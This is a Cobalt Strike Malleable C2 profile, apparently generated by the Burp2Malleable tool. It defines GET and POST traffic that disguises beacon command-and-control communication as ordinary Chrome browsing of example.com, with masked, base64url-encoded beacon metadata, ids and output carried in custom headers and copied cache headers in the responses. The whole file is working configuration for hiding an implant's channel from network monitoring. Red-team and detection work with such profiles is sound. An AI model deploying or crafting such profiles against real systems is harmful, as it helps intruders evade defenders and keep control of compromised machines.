
############################################################################
# Generated by Burp2Malleable - https://github.com/CodeXTF2/Burp2Malleable #     
# By: CodeX                                                                #
############################################################################
# Automatically generated with pyMalleableC2
# https://github.com/Porchetta-Industries/pyMalleableC2
#
# !!! Make sure to run this profile through c2lint before using !!!

http-get {
    set verb "GET";
    set uri "/sad";
    client {
        header "Host" "example.com";
        header "Upgrade-Insecure-Requests" "1";
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
        header "Accept-Encoding" "gzip, deflate";
        header "Accept-Language" "en-US,en;q=0.9";
        header "Connection" "close";
        metadata {
            mask;
            base64url;
            prepend "";
            append "";
            header "a";
        }
    }
    server {
        output {
            mask;
            base64url;
            prepend "prependddddddddddd";
            append "appendddddddddddd";
            print;
        }
        header "Accept-Ranges" "bytes";
        header "Age" "441594";
        header "Cache-Control" "max-age=604800";
        header "Content-Type" "text/html; charset=UTF-8";
        header "Date" "Sun, 14 Aug 2022 17:45:50 GMT";
        header "Etag" "'3147526947'";
        header "Expires" "Sun, 21 Aug 2022 17:45:50 GMT";
        header "Last-Modified" "Thu, 17 Oct 2019 07:18:26 GMT";
        header "Server" "ECS (oxr/832D)";
        header "Vary" "Accept-Encoding";
        header "X-Cache" "HIT";
        header "Content-Length" "1256";
        header "Connection" "close";
    }
}
http-post {
    set verb "GET";
    set uri "/SAD";
    client {
        header "Host" "example.com";
        header "Upgrade-Insecure-Requests" "1";
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
        header "Accept-Encoding" "gzip, deflate";
        header "Accept-Language" "en-US,en;q=0.9";
        header "Connection" "close";
        id {
            mask;
            base64url;
            header "b";
        }
        output {
            mask;
            base64url;
            header "c";
        }
    }
    server {
        output {
            mask;
            base64url;
            print;
        }
        header "Accept-Ranges" "bytes";
        header "Age" "441594";
        header "Cache-Control" "max-age=604800";
        header "Content-Type" "text/html; charset=UTF-8";
        header "Date" "Sun, 14 Aug 2022 17:45:50 GMT";
        header "Etag" "'3147526947'";
        header "Expires" "Sun, 21 Aug 2022 17:45:50 GMT";
        header "Last-Modified" "Thu, 17 Oct 2019 07:18:26 GMT";
        header "Server" "ECS (oxr/832D)";
        header "Vary" "Accept-Encoding";
        header "X-Cache" "HIT";
        header "Content-Length" "1256";
        header "Connection" "close";
    }
}
